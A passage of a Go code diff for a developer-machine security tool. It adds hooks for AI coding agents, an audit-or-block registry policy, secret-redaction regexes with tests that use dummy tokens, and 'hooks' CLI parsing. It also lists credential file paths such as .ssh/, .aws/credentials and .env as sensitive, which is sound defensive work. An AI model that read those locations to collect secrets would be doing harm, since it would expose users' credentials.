+)
+
+// Mode controls what the runtime does with a policy violation.
+//
+//   - ModeAudit: evaluate, persist a finding describing what *would* have
+//     blocked, but always emit an allow response to the agent.
+//   - ModeBlock: evaluate, persist the finding, and on an explicit
+//     violation flip the response to block.
+//
+// Mode is policy-wide; there is no per-ecosystem override. Endpoint-level
+// behavior is the call the org wants to make uniformly across ecosystems.
+type Mode string
+
+const (
+	ModeAudit Mode = "audit"
+	ModeBlock Mode = "block"
+)
+
+// Policy is the active policy document. Per-ecosystem enforcement lives
+// under Ecosystems; a missing or disabled block means the runtime allows
+// that ecosystem unconditionally and emits no policy_decision.
+type Policy struct {
+	Version    int                           `json:"version"`
+	Mode       Mode                          `json:"mode,omitempty"`
+	Ecosystems map[Ecosystem]EcosystemPolicy `json:"ecosystems"`
+}
+
+// ResolveMode returns p.Mode if it is a known value; otherwise ModeAudit.
+// Unknown or empty strings collapse to audit so a malformed policy can
+// never silently switch the endpoint into block mode.
+func ResolveMode(p Policy) Mode {
+	switch p.Mode {
+	case ModeBlock:
+		return ModeBlock
+	default:
+		return ModeAudit
+	}
+}
+
+// EcosystemPolicy carries the per-ecosystem enforcement settings. Today
+// every ecosystem is registry-pin only; future fields land here without
+// changing the surrounding shape.
+type EcosystemPolicy struct {
+	Enabled  bool           `json:"enabled"`
+	Registry RegistryPolicy `json:"registry"`
+}
+
+// RegistryPolicy expresses the secure-registry pinning policy.
+type RegistryPolicy struct {
+	// Allowlist is the set of permitted registry URLs. Matching is
+	// prefix-based after trailing-slash normalization.
+	Allowlist []string `json:"allowlist"`
+}
+
+// builtinPolicyJSON is compiled into the binary; there is no runtime
+// file read and no on-disk override.
+//go:embed builtin/policy.json
+var builtinPolicyJSON []byte
+
+// Builtin returns the embedded policy. The embedded JSON is checked at
+// build time by the test suite; a parse failure here is a programmer
+// error, not a runtime condition.
+func Builtin() Policy {
+	var p Policy
+	if err := json.Unmarshal(builtinPolicyJSON, &p); err != nil {
+		// Unreachable for a well-formed embedded file; panicking keeps
+		// the failure loud instead of silently enforcing a zero Policy.
+		panic(fmt.Errorf("policy: builtin parse: %w", err))
+	}
+	return p
+}
diff --git a/internal/aiagents/policy/policy_test.go b/internal/aiagents/policy/policy_test.go
new file mode 100644
index 0000000..787a4df
--- /dev/null
+++ b/internal/aiagents/policy/policy_test.go
@@ -0,0 +1,50 @@
+package policy
+
+import "testing"
+
+func TestBuiltinParses(t *testing.T) {
+	p := Builtin()
+	if p.Version == 0 {
+		t.Errorf("builtin policy: version 0")
+	}
+	npm, ok := p.Ecosystems[EcosystemNPM]
+	if !ok {
+		t.Fatalf("builtin policy: missing npm block")
+	}
+	if !npm.Enabled {
+		t.Errorf("builtin policy: npm block must ship enabled")
+	}
+	if len(npm.Registry.Allowlist) == 0 {
+		t.Errorf("builtin policy: expected allowlist")
+	}
+}
+
+func TestBuiltinDefaultsToAuditMode(t *testing.T) {
+	p := Builtin()
+	if got := ResolveMode(p); got != ModeAudit {
+		t.Errorf("builtin policy: expected audit mode, got %q", got)
+	}
+}
+
+func TestResolveModeFallsBackToAudit(t *testing.T) {
+	cases := []struct {
+		name string
+		in   Mode
+	}{
+		{"empty", ""},
+		{"unknown", "garbage"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			if got := ResolveMode(Policy{Mode: tc.in}); got != ModeAudit {
+				t.Errorf("ResolveMode(%q) = %q, want %q", tc.in, got, ModeAudit)
+			}
+		})
+	}
+}
+
+func TestResolveModeHonorsBlock(t *testing.T) {
+	if got := ResolveMode(Policy{Mode: ModeBlock}); got != ModeBlock {
+		t.Errorf("ResolveMode(block) = %q, want %q", got, ModeBlock)
+	}
+}
diff --git a/internal/aiagents/redact/redact.go b/internal/aiagents/redact/redact.go
new file mode 100644
index 0000000..50aec7b
--- /dev/null
+++ b/internal/aiagents/redact/redact.go
@@ -0,0 +1,237 @@
+// Package redact removes likely secrets from strings and JSON-shaped values
+// before they are written to disk or sent over the wire. Redaction MUST
+// run before every write, including error logs.
+package redact
+
+import (
+	"regexp"
+	"strings"
+)
+
+// Placeholder is what every matched secret is replaced with.
+const Placeholder = "[REDACTED]"
+
+// rule pairs a compiled regex with the submatch group whose content should be
+// replaced. group == 0 redacts the entire match.
+type rule struct {
+	name  string
+	re    *regexp.Regexp
+	group int
+}
+
+// rules is intentionally conservative. Adding too aggressive a rule risks
+// turning normal logs into a wall of [REDACTED] and hiding genuine signal.
+// Every rule here exists to satisfy the redaction regression tests.
+var rules = []rule{
+	// PEM-encoded private keys: redact the whole block. The optional
+	// ` BLOCK` suffix covers PGP armor (`BEGIN PGP PRIVATE KEY BLOCK`)
+	// alongside RSA / OPENSSH / PKCS#8 ("BEGIN PRIVATE KEY") variants.
+	// (?s) lets `.` span the multi-line key body.
+	{
+		name: "private_key_block",
+		re:   regexp.MustCompile(`(?s)-----BEGIN[ A-Z]*PRIVATE KEY( BLOCK)?-----.*?-----END[ A-Z]*PRIVATE KEY( BLOCK)?-----`),
+	},
+	// AWS access key IDs: stable prefix + 16 base32-ish chars.
+	{
+		name: "aws_access_key_id",
+		re:   regexp.MustCompile(`\b(?:AKIA|ASIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ABIA|ACCA)[0-9A-Z]{16}\b`),
+	},
+	// GitHub classic tokens (PAT, OAuth, server-to-server, refresh).
+	// The header-style rule below covers `github_pat_*` fine-grained
+	// tokens, which use a different prefix shape.
+	{
+		name: "github_token",
+		re:   regexp.MustCompile(`\bgh[pousr]_[A-Za-z0-9]{16,}\b`),
+	},
+	// GitHub fine-grained PAT: `github_pat_<22>_<59>` per GitHub docs.
+	// The inner `_` between the two segments is matched by the
+	// underscore in the character class.
+	{
+		name: "github_fine_grained_pat",
+		re:   regexp.MustCompile(`\bgithub_pat_[A-Za-z0-9_]{20,}\b`),
+	},
+	// Slack tokens.
+	{
+		name: "slack_token",
+		re:   regexp.MustCompile(`\bxox[abprs]-[A-Za-z0-9-]{10,}\b`),
+	},
+	// Authorization: Bearer .
+	{
+		name:  "bearer_token",
+		re:    regexp.MustCompile(`(?i)(authorization\s*[:=]\s*"?\s*bearer\s+)([A-Za-z0-9._\-+/=]{8,})`),
+		group: 2,
+	},
+	// Standalone "Bearer " outside of an Authorization header.
+	{
+		name:  "bearer_inline",
+		re:    regexp.MustCompile(`(?i)\b(bearer\s+)([A-Za-z0-9._\-+/=]{16,})`),
+		group: 2,
+	},
+	// npm auth tokens in .npmrc style.
+	{
+		name:  "npm_auth_token",
+		re:    regexp.MustCompile(`(?i)(_authToken\s*=\s*)([^\s"]+)`),
+		group: 2,
+	},
+	{
+		name:  "npm_auth",
+		re:    regexp.MustCompile(`(?i)(\b_auth\s*=\s*)([^\s"]+)`),
+		group: 2,
+	},
+	// AWS secret access key style assignments.
+	{
+		name:  "aws_secret_access_key",
+		re:    regexp.MustCompile(`(?i)(aws_secret_access_key\s*[:=]\s*"?)([A-Za-z0-9/+=]{30,})`),
+		group: 2,
+	},
+	// Generic KEY=value assignments for common secret-bearing names.
+	{
+		name:  "secret_assignment",
+		re:    regexp.MustCompile(`(?i)\b([A-Z0-9_]*(?:PASSWORD|PASSWD|SECRET|TOKEN|API[_-]?KEY|ACCESS[_-]?KEY|PRIVATE[_-]?KEY))\s*[:=]\s*("?)([^\s"'#]+)`),
+		group: 3,
+	},
+	// JSON-shaped key/value pairs, e.g. "api_key": "abc".
+	{
+		name:  "secret_json_field",
+		re:    regexp.MustCompile(`(?i)("(?:password|passwd|secret|token|api[_-]?key|access[_-]?key|private[_-]?key|authorization)"\s*:\s*")([^"]+)`),
+		group: 2,
+	},
+	// URL userinfo: https://user:pass@host/... — redact the userinfo
+	// segment (everything between scheme:// and @). Matches any scheme.
+	{
+		name:  "url_userinfo",
+		re:    regexp.MustCompile(`(?i)\b([a-z][a-z0-9+.\-]*://)([^\s/@]+)@`),
+		group: 2,
+	},
+	// URL query-string credentials. Param name is matched with an
+	// optional `_` so suffix variants (access_token,
+	// refresh_token, id_token, client_secret, jwt_signature, ...) are
+	// covered. OAuth `code` and `state` are short-lived but
+	// credential-grade during their window.
+	{
+		name:  "url_query_secret",
+		re:    regexp.MustCompile(`(?i)([?&](?:[a-z0-9_-]*_)?(?:token|secret|signature|password|passwd|api[_-]?key|apikey|auth|sig|code|state)=)([^&\s#]+)`),
+		group: 2,
+	},
+}
+
+// Sensitive path patterns. Callers consult these to decide whether a
+// payload references credential material.
+var sensitivePathREs = []*regexp.Regexp{
+	regexp.MustCompile(`(^|/)\.env(\.|$)`),
+	// NOTE(review): the rule above already matches a bare ".env" via its
+	// `$` alternative, so this entry looks redundant — harmless, but
+	// confirm before removing.
+	regexp.MustCompile(`(^|/)\.env$`),
+	regexp.MustCompile(`(^|/)secrets/`),
+	regexp.MustCompile(`\.pem$`),
+	regexp.MustCompile(`\.key$`),
+	regexp.MustCompile(`\.p12$`),
+	regexp.MustCompile(`(^|/)\.ssh/`),
+	regexp.MustCompile(`(^|/)\.aws/`),
+	regexp.MustCompile(`(^|/)\.npmrc$`),
+	regexp.MustCompile(`(^|/)\.pypirc$`),
+}
+
+// String redacts secrets in s by applying every rule in order.
+func String(s string) string {
+	if s == "" {
+		return s
+	}
+	out := s
+	for _, r := range rules {
+		out = applyRule(out, r)
+	}
+	return out
+}
+
+// applyRule replaces either the whole match (group 0) or just the named
+// capture group, preserving the surrounding text (e.g. the "Bearer "
+// prefix stays readable while the token itself is replaced).
+func applyRule(s string, r rule) string {
+	if !r.re.MatchString(s) {
+		return s
+	}
+	if r.group == 0 {
+		return r.re.ReplaceAllString(s, Placeholder)
+	}
+	return r.re.ReplaceAllStringFunc(s, func(match string) string {
+		// Re-match inside the matched span to recover group offsets;
+		// subtracting idx[0] makes them relative to `match`.
+		idx := r.re.FindStringSubmatchIndex(match)
+		if idx == nil || len(idx) < 2*(r.group+1) {
+			return Placeholder
+		}
+		start := idx[2*r.group] - idx[0]
+		end := idx[2*r.group+1] - idx[0]
+		// A non-participating group yields -1 offsets; fall back to
+		// redacting the whole match rather than slicing out of range.
+		if start < 0 || end < 0 || start > end || end > len(match) {
+			return Placeholder
+		}
+		return match[:start] + Placeholder + match[end:]
+	})
+}
+
+// Bytes is a convenience wrapper around String for []byte data.
+func Bytes(b []byte) []byte {
+	if len(b) == 0 {
+		return b
+	}
+	return []byte(String(string(b)))
+}
+
+// Value walks an arbitrary JSON-decoded value (map[string]any, []any, string,
+// numbers, etc.) and redacts any string leaves. Map keys whose lowercased
+// names look secret-bearing are redacted entirely.
+func Value(v any) any { + switch t := v.(type) { + case nil: + return nil + case string: + return String(t) + case map[string]any: + out := make(map[string]any, len(t)) + for k, val := range t { + if isSecretKey(k) { + if _, ok := val.(string); ok { + out[k] = Placeholder + continue + } + out[k] = Placeholder + continue + } + out[k] = Value(val) + } + return out + case []any: + out := make([]any, len(t)) + for i, val := range t { + out[i] = Value(val) + } + return out + default: + return v + } +} + +func isSecretKey(k string) bool { + lk := strings.ToLower(k) + switch lk { + case "password", "passwd", "secret", "token", "api_key", "apikey", + "access_key", "accesskey", "private_key", "privatekey", + "authorization", "_authtoken", "_auth", "api-key": + return true + } + return strings.Contains(lk, "password") || + strings.Contains(lk, "secret") || + strings.Contains(lk, "token") || + strings.Contains(lk, "api_key") || + strings.Contains(lk, "apikey") || + strings.Contains(lk, "private_key") || + strings.Contains(lk, "authorization") +} + +// IsSensitivePath reports whether p matches any of the credential-bearing +// path patterns. +func IsSensitivePath(p string) bool { + if p == "" { + return false + } + norm := strings.ReplaceAll(p, "\\", "/") + for _, re := range sensitivePathREs { + if re.MatchString(norm) { + return true + } + } + return false +} diff --git a/internal/aiagents/redact/redact_test.go b/internal/aiagents/redact/redact_test.go new file mode 100644 index 0000000..6f6c9a3 --- /dev/null +++ b/internal/aiagents/redact/redact_test.go @@ -0,0 +1,418 @@ +package redact + +import ( + "strings" + "testing" +) + +func TestStringRedactsCommonSecrets(t *testing.T) { + cases := []struct { + name string + in string + // substrings that must NOT appear in the redacted output. 
+ mustNotContain []string + }{ + { + name: "stepsecurity api key", + in: `STEPSECURITY_API_KEY=ss_live_AbCdEfGhIjKlMnOp`, + mustNotContain: []string{"ss_live_AbCdEfGhIjKlMnOp"}, + }, + { + name: "npm authToken", + in: "//registry.npmjs.org/:_authToken=npm_xyzabc1234567890", + mustNotContain: []string{"npm_xyzabc1234567890"}, + }, + { + name: "npm _auth", + in: "_auth=dXNlcjpwYXNzd29yZA==", + mustNotContain: []string{"dXNlcjpwYXNzd29yZA=="}, + }, + { + name: "bearer header", + in: "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.payload.sig", + mustNotContain: []string{"eyJhbGciOiJIUzI1NiJ9.payload.sig"}, + }, + { + name: "aws access key", + in: "key AKIAIOSFODNN7EXAMPLE here", + mustNotContain: []string{"AKIAIOSFODNN7EXAMPLE"}, + }, + { + name: "aws secret key", + in: `AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"`, + mustNotContain: []string{"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"}, + }, + { + name: "password assignment", + in: "DB_PASSWORD=hunter2", + mustNotContain: []string{"hunter2"}, + }, + { + name: "token assignment", + in: "GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + mustNotContain: []string{"ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}, + }, + { + name: "secret assignment", + in: "JWT_SECRET=topsecretvalue", + mustNotContain: []string{"topsecretvalue"}, + }, + { + name: "api key assignment", + in: "OPENAI_API_KEY=sk-proj-1234567890abcdef", + mustNotContain: []string{"sk-proj-1234567890abcdef"}, + }, + { + name: "bare password assignment", + in: "PASSWORD=hunter2", + mustNotContain: []string{"hunter2"}, + }, + { + name: "bare token assignment", + in: "TOKEN=abc123def456", + mustNotContain: []string{"abc123def456"}, + }, + { + name: "bare api key assignment", + in: "API_KEY=sk-proj-bare123456", + mustNotContain: []string{"sk-proj-bare123456"}, + }, + { + name: "private key block", + in: "-----BEGIN RSA PRIVATE KEY-----\n" + + "MIIBOgIBAAJBAKj\n" + + "-----END RSA PRIVATE KEY-----", + mustNotContain: []string{"MIIBOgIBAAJBAKj"}, 
+ }, + { + name: "url userinfo", + in: "fetched https://alice:s3cret@api.example.com:8443/users", + mustNotContain: []string{"alice:s3cret", "s3cret"}, + }, + { + name: "url query token", + in: "redirect to https://example.com/cb?token=abc123def456 then proceed", + mustNotContain: []string{"abc123def456"}, + }, + { + name: "url query access_token", + in: "https://api.example.com/me?access_token=zzzzz&user=alice", + mustNotContain: []string{"zzzzz"}, + }, + { + name: "url query refresh_token", + in: "https://api.example.com/cb?refresh_token=rrrrr", + mustNotContain: []string{"rrrrr"}, + }, + { + name: "url query id_token", + in: "https://idp.example.com/cb?id_token=jjjjj", + mustNotContain: []string{"jjjjj"}, + }, + { + name: "url query client_secret", + in: "https://idp.example.com/token?client_id=app&client_secret=ssssss", + mustNotContain: []string{"ssssss"}, + }, + { + name: "url query oauth code", + in: "https://app.example.com/cb?code=AUTHCODEABC&state=xyz", + mustNotContain: []string{"AUTHCODEABC"}, + }, + { + name: "url query oauth state", + in: "https://app.example.com/cb?state=opaqueSESSION123", + mustNotContain: []string{"opaqueSESSION123"}, + }, + } + + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + out := String(tc.in) + if !strings.Contains(out, Placeholder) { + t.Fatalf("expected redaction placeholder in output; got %q", out) + } + for _, banned := range tc.mustNotContain { + if strings.Contains(out, banned) { + t.Fatalf("redacted output still contains %q: %q", banned, out) + } + } + }) + } +} + +func TestStringPreservesNonSecrets(t *testing.T) { + cases := []string{ + "user ran: npm install lodash", + // URL with no userinfo or credential query params must pass through. + "https://api.example.com:8443/v1/users?user=alice&limit=10", + // Param names that merely *contain* a keyword fragment but do not + // end on it must NOT be redacted (e.g. statefulservice contains + // "state", client_id is public). 
+ "https://api.example.com/v1?statefulservice=true", + "https://idp.example.com/authorize?client_id=public_app_id", + } + for _, in := range cases { + if got := String(in); got != in { + t.Errorf("expected unchanged, got %q", got) + } + } +} + +// URL userinfo redaction must keep the host portion intact so the +// audit log still shows where traffic went. +func TestStringRedactsURLUserinfoKeepsHost(t *testing.T) { + got := String("https://user:secret@mcp.example.com:8443/path") + if !strings.Contains(got, "mcp.example.com:8443") { + t.Errorf("host stripped: %q", got) + } + if strings.Contains(got, "secret") || strings.Contains(got, "user:") { + t.Errorf("userinfo leaked: %q", got) + } +} + +func TestValueRedactsNestedSecrets(t *testing.T) { + in := map[string]any{ + "command": "git push", + "env": map[string]any{ + "GITHUB_TOKEN": "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + "USER": "alice", + }, + "headers": []any{ + "Authorization: Bearer eyJ.payload.sig", + }, + } + out := Value(in).(map[string]any) + env := out["env"].(map[string]any) + if env["GITHUB_TOKEN"] != Placeholder { + t.Fatalf("expected GITHUB_TOKEN redacted by key, got %v", env["GITHUB_TOKEN"]) + } + if env["USER"] != "alice" { + t.Fatalf("expected USER preserved, got %v", env["USER"]) + } + hdr := out["headers"].([]any)[0].(string) + if strings.Contains(hdr, "eyJ.payload.sig") { + t.Fatalf("bearer not redacted in nested array: %q", hdr) + } +} + +func TestStringIsIdempotent(t *testing.T) { + // Running redaction twice must produce the same output as running it + // once. Re-running is the simplest way for a caller (e.g., the error + // logger) to be sure a previously-redacted string isn't double-mangled. 
+ inputs := []string{ + "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.payload.sig", + "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", + "https://alice:s3cret@api.example.com/users", + "plain log line with no secrets", + "", + } + for _, in := range inputs { + once := String(in) + twice := String(once) + if once != twice { + t.Errorf("not idempotent for %q:\n once = %q\n twice = %q", in, once, twice) + } + } +} + +func TestStringRedactsMultipleSecretsInOneInput(t *testing.T) { + in := "AKIAIOSFODNN7EXAMPLE then ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa then bearer eyJ.payload.sig.AAAAAAAAAAA" + out := String(in) + for _, banned := range []string{ + "AKIAIOSFODNN7EXAMPLE", + "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + "eyJ.payload.sig.AAAAAAAAAAA", + } { + if strings.Contains(out, banned) { + t.Errorf("multi-secret line still contains %q: %q", banned, out) + } + } +} + +func TestStringRedactsGitHubFineGrainedPAT(t *testing.T) { + // Fine-grained PATs use a different prefix from classic ghp_ tokens + // and contain an inner underscore between the prefix and body. + in := "GH_TOKEN=github_pat_11ABCDEFG0123456789_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMN" + out := String(in) + if strings.Contains(out, "github_pat_11ABCDEFG0123456789_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMN") { + t.Errorf("github fine-grained PAT not redacted: %q", out) + } +} + +func TestStringRedactsPrivateKeyVariants(t *testing.T) { + // All four PEM/armor variants the audit pipeline can plausibly see + // must redact the whole block, not just one BEGIN/END line. 
+ cases := []struct { + name string + in string + mustOut string // body content that must NOT appear after redaction + }{ + { + name: "RSA", + in: "-----BEGIN RSA PRIVATE KEY-----\nBODYRSA\n-----END RSA PRIVATE KEY-----", + mustOut: "BODYRSA", + }, + { + name: "PKCS8", + in: "-----BEGIN PRIVATE KEY-----\nBODYPKCS8\n-----END PRIVATE KEY-----", + mustOut: "BODYPKCS8", + }, + { + name: "OPENSSH", + in: "-----BEGIN OPENSSH PRIVATE KEY-----\nBODYSSH\n-----END OPENSSH PRIVATE KEY-----", + mustOut: "BODYSSH", + }, + { + name: "PGP", + in: "-----BEGIN PGP PRIVATE KEY BLOCK-----\nBODYPGP\n-----END PGP PRIVATE KEY BLOCK-----", + mustOut: "BODYPGP", + }, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + out := String(tc.in) + if strings.Contains(out, tc.mustOut) { + t.Errorf("%s body leaked: %q", tc.name, out) + } + if !strings.Contains(out, Placeholder) { + t.Errorf("%s missing placeholder: %q", tc.name, out) + } + }) + } +} + +func TestBytesWrapsString(t *testing.T) { + // Bytes is a thin wrapper. Test the three input shapes a caller can + // hand it: nil, empty slice, populated. + if got := Bytes(nil); got != nil { + t.Errorf("Bytes(nil) = %v, want nil", got) + } + if got := Bytes([]byte{}); len(got) != 0 { + t.Errorf("Bytes(empty) = %v, want empty", got) + } + in := []byte("Authorization: Bearer eyJ.payload.sig.AAAAAAAAAAA") + out := Bytes(in) + if strings.Contains(string(out), "eyJ.payload.sig.AAAAAAAAAAA") { + t.Errorf("Bytes did not redact: %q", string(out)) + } +} + +func TestValueHandlesNonStringLeaves(t *testing.T) { + // Numbers, booleans, and nil must pass through untouched. Only string + // leaves get redacted. 
+ in := map[string]any{ + "count": 42, + "ratio": 0.5, + "flag": true, + "missing": nil, + "note": "no secret here", + } + out := Value(in).(map[string]any) + if out["count"] != 42 { + t.Errorf("int leaf mutated: %v", out["count"]) + } + if out["ratio"] != 0.5 { + t.Errorf("float leaf mutated: %v", out["ratio"]) + } + if out["flag"] != true { + t.Errorf("bool leaf mutated: %v", out["flag"]) + } + if out["missing"] != nil { + t.Errorf("nil leaf mutated: %v", out["missing"]) + } + if out["note"] != "no secret here" { + t.Errorf("clean string leaf mutated: %v", out["note"]) + } +} + +func TestValueRedactsSecretKeyEvenWithNonStringValue(t *testing.T) { + // A secret-looking key replaces the value with [REDACTED] regardless + // of value type — a numeric token is still a token. + in := map[string]any{ + "token": 12345, + "secret": []any{"a", "b"}, + "safe": "ok", + } + out := Value(in).(map[string]any) + if out["token"] != Placeholder { + t.Errorf("numeric token not redacted: %v", out["token"]) + } + if out["secret"] != Placeholder { + t.Errorf("array under secret key not redacted: %v", out["secret"]) + } + if out["safe"] != "ok" { + t.Errorf("safe leaf mutated: %v", out["safe"]) + } +} + +func TestValueDeeplyNested(t *testing.T) { + // Three-level nesting through both maps and slices. Redaction must + // reach the innermost string. + in := map[string]any{ + "l1": map[string]any{ + "l2": []any{ + map[string]any{ + "headers": []any{ + "Authorization: Bearer eyJ.payload.sig.AAAAAAAAAAA", + }, + }, + }, + }, + } + out := Value(in).(map[string]any) + l1 := out["l1"].(map[string]any) + l2 := l1["l2"].([]any) + l3 := l2[0].(map[string]any) + hdr := l3["headers"].([]any)[0].(string) + if strings.Contains(hdr, "eyJ.payload.sig.AAAAAAAAAAA") { + t.Errorf("deeply nested bearer not redacted: %q", hdr) + } +} + +func TestIsSensitivePathWindowsBackslash(t *testing.T) { + // IsSensitivePath normalizes backslashes so a Windows path hits the + // same regexes as the POSIX equivalent. 
+ for _, p := range []string{ + `C:\Users\x\.env`, + `C:\Users\x\.aws\credentials`, + `C:\Users\x\.ssh\id_rsa`, + `secrets\db.yaml`, + } { + if !IsSensitivePath(p) { + t.Errorf("expected %q (Windows-style) to be sensitive", p) + } + } +} + +func TestIsSensitivePathEmpty(t *testing.T) { + if IsSensitivePath("") { + t.Error("empty path must not be flagged sensitive") + } +} + +func TestIsSensitivePath(t *testing.T) { + yes := []string{ + "/Users/x/.env", + "./.env.production", + "app/secrets/db.yaml", + "keys/server.pem", + "id_rsa.key", + "cert.p12", + "/home/x/.ssh/id_rsa", + "/Users/x/.aws/credentials", + "./.npmrc", + "./.pypirc", + } + for _, p := range yes { + if !IsSensitivePath(p) { + t.Errorf("expected %q to be sensitive", p) + } + } + no := []string{"README.md", "src/main.go", "config.json"} + for _, p := range no { + if IsSensitivePath(p) { + t.Errorf("expected %q to NOT be sensitive", p) + } + } +} diff --git a/internal/cli/cli.go b/internal/cli/cli.go index 04e1515..29ab40a 100644 --- a/internal/cli/cli.go +++ b/internal/cli/cli.go @@ -4,14 +4,20 @@ import ( "fmt" "os" "path/filepath" + "slices" "strings" "github.com/step-security/dev-machine-guard/internal/buildinfo" ) // Config holds all parsed CLI flags. +// +// The hidden `_hook` runtime is intentionally NOT represented here. Agents +// invoke `_hook` on every event and any non-zero exit is treated as a hook +// failure, so the hot path bypasses cli.Parse entirely — see main.go's +// early-return and internal/aiagents/cli.RunHook. 
type Config struct { - Command string // "", "install", "uninstall", "send-telemetry", "configure", "configure show" + Command string // "", "install", "uninstall", "send-telemetry", "configure", "configure show", "hooks install", "hooks uninstall" OutputFormat string // "pretty", "json", "html" OutputFormatSet bool // true if --pretty/--json/--html was explicitly passed (not persisted) HTMLOutputFile string // set by --html (not persisted) @@ -23,10 +29,33 @@ type Config struct { EnablePythonScan *bool // nil=auto, true/false=explicit IncludeBundledPlugins bool // --include-bundled-plugins: include bundled/platform plugins in output SearchDirs []string // defaults to ["$HOME"] + + // HooksAgent is the --agent value on `hooks install` / `hooks uninstall`; + // "" means "every detected agent". + HooksAgent string +} + +// supportedHookAgents lists the agent names accepted by `hooks --agent ` and `_hook ...`. +// Supported agents: claude-code and codex; the list grows as adapters are added. +var supportedHookAgents = []string{"claude-code", "codex"} + +func isSupportedHookAgent(name string) bool { + return slices.Contains(supportedHookAgents, name) } // Parse parses CLI arguments and returns a Config. func Parse(args []string) (*Config, error) { + // AI-agent hooks subcommands have a deliberately narrow flag surface: + // only `--agent ` (and `--help`) are accepted. None of the DMG + // scan/output flags apply, so we branch off the main parser here to + // reject them with a clear error rather than silently honoring them. + // + // Note: the hidden `_hook` runtime does NOT route through Parse — main + // intercepts it before any init runs. Don't add a `_hook` arm here. + if len(args) > 0 && args[0] == "hooks" { + return parseHooks(args[1:]) + } + cfg := &Config{ OutputFormat: "pretty", ColorMode: "auto", @@ -136,6 +165,97 @@ func Parse(args []string) (*Config, error) { return cfg, nil } +// parseHooks handles `hooks install` and `hooks uninstall`. 
+// +// Accepted flags: --agent , --help. Anything else (including DMG global +// flags like --json, --verbose, --search-dirs) is rejected so users get a +// clear signal that those flags don't apply to the hooks group. +func parseHooks(args []string) (*Config, error) { + if len(args) == 0 { + return nil, fmt.Errorf("missing subcommand: expected `hooks install` or `hooks uninstall`, run '%s hooks --help' for usage", filepath.Base(os.Args[0])) + } + + verb := args[0] + switch verb { + case "install", "uninstall": + // continue + case "-h", "--help", "help": + printHooksHelp() + os.Exit(0) + default: + return nil, fmt.Errorf("unknown `hooks` subcommand: %s, run '%s hooks --help' for usage", verb, filepath.Base(os.Args[0])) + } + + cfg := &Config{ + Command: "hooks " + verb, + OutputFormat: "pretty", + ColorMode: "auto", + SearchDirs: []string{"$HOME"}, + } + + rest := args[1:] + for i := 0; i < len(rest); i++ { + arg := rest[i] + switch { + case arg == "--agent": + i++ + if i >= len(rest) { + return nil, fmt.Errorf("--agent requires an agent name (one of: %s)", strings.Join(supportedHookAgents, ", ")) + } + name := rest[i] + if !isSupportedHookAgent(name) { + return nil, fmt.Errorf("unsupported agent: %s (supported: %s)", name, strings.Join(supportedHookAgents, ", ")) + } + cfg.HooksAgent = name + case strings.HasPrefix(arg, "--agent="): + name := strings.TrimPrefix(arg, "--agent=") + if name == "" { + return nil, fmt.Errorf("--agent requires an agent name (one of: %s)", strings.Join(supportedHookAgents, ", ")) + } + if !isSupportedHookAgent(name) { + return nil, fmt.Errorf("unsupported agent: %s (supported: %s)", name, strings.Join(supportedHookAgents, ", ")) + } + cfg.HooksAgent = name + case arg == "-h" || arg == "--help": + printHooksHelp() + os.Exit(0) + default: + return nil, fmt.Errorf("unknown option for `hooks %s`: %s (only --agent is accepted)", verb, arg) + } + } + + return cfg, nil +} + +func printHooksHelp() { + name := filepath.Base(os.Args[0]) + _, _ = 
fmt.Fprintf(os.Stdout, `StepSecurity Dev Machine Guard v%s — AI agent hooks + +Usage: %s hooks [--agent ] + +Subcommands: + install Install audit-mode hooks for detected AI coding agents. + Hook events are uploaded to your StepSecurity dashboard; + no agent activity is blocked. + uninstall Remove hooks previously installed by this tool. + +Options: + --agent Target a specific agent (default: every detected agent). + Supported: %s + +Examples: + %s hooks install # install for every detected agent + %s hooks install --agent claude-code # install only for Claude Code + %s hooks uninstall # remove all DMG-owned hook entries + +Diagnostics: + Hook errors are appended to ~/.stepsecurity/ai-agent-hook-errors.jsonl. + +%s +`, buildinfo.Version, name, strings.Join(supportedHookAgents, ", "), + name, name, name, buildinfo.AgentURL) +} + func printHelp() { name := filepath.Base(os.Args[0]) _, _ = fmt.Fprintf(os.Stdout, `StepSecurity Dev Machine Guard v%s @@ -148,6 +268,7 @@ Commands: install Install scheduled scanning (enterprise) uninstall Remove scheduled scanning (enterprise) send-telemetry Upload scan results to the StepSecurity dashboard (enterprise) + hooks Install/uninstall AI coding agent hooks (run '%s hooks --help') Output formats (community mode, mutually exclusive): --pretty Pretty terminal output (default) @@ -186,7 +307,7 @@ Configuration: Run '%s configure' to set enterprise credentials and search directories interactively. 
